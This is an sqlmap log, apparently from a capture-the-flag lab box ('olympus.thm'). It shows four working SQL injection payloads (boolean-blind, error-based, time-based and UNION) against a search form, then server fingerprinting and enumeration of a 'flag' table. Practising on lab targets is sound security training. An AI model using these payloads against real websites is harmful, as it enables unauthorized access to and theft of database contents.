        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.10.4#stable}
|_ -| . [,]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 18:46:37 /2026-06-02/

[18:46:37] [DEBUG] cleaning up configuration parameters
[18:46:37] [DEBUG] setting the HTTP timeout
[18:46:37] [DEBUG] setting the HTTP User-Agent header
[18:46:37] [DEBUG] loading random HTTP User-Agent header(s) from file '/usr/share/sqlmap/data/txt/user-agents.txt'
[18:46:37] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Edg/129.0.0.0' from file '/usr/share/sqlmap/data/txt/user-agents.txt'
[18:46:37] [DEBUG] creating HTTP requests opener object
custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q] [18:46:38] [INFO] resuming back-end DBMS 'mysql' 
[18:46:38] [DEBUG] resolving hostname 'olympus.thm'
[18:46:38] [INFO] testing connection to the target URL
[18:46:38] [DEBUG] declared web page charset 'utf-8'
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=ebteerj23gg...hcoj7boct8'). Do you want to use those [Y/n] sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: search=1337' OR NOT 3318=3318#&submit=
    Vector: OR NOT [INFERENCE]#

    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: search=1337' AND EXTRACTVALUE(9521,CONCAT(0x5c,0x7170767a71,(SELECT (ELT(9521=9521,1))),0x716b766a71))-- EThr&submit=
    Vector: AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=1337' AND (SELECT 3016 FROM (SELECT(SLEEP(5)))IHpj)-- ojmS&submit=
    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

    Type: UNION query
    Title: MySQL UNION query (NULL) - 10 columns
    Payload: search=1337' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170767a71,0x65546f53547652636e4f65477a4d6f564b666c72506a6776615457646f4f6f417665575864694e6b,0x716b766a71),NULL,NULL,NULL#&submit=
    Vector:  UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,[QUERY],NULL,NULL,NULL#
---
[18:46:40] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.10 or 20.04 or 19.10 (focal or eoan)
web application technology: PHP, Apache 2.4.41
back-end DBMS: MySQL >= 5.1
[18:46:40] [INFO] fetching columns for table 'flag' in database 'olympus'
[18:46:40] [DEBUG] resuming configuration option 'string' ('result')
[18:46:40] [DEBUG] performed 0 queries in 0.00 seconds
Database: olympus
Table: flag
[1 column]
+--------+--------------+
| Column | Type         |
+--------+--------------+
| flag   | varchar(255) |
+--------+--------------+

[18:46:40] [INFO] fetched data logged to text files under '/home/tomc/.local/share/sqlmap/output/olympus.thm'

[*] ending @ 18:46:40 /2026-06-02/

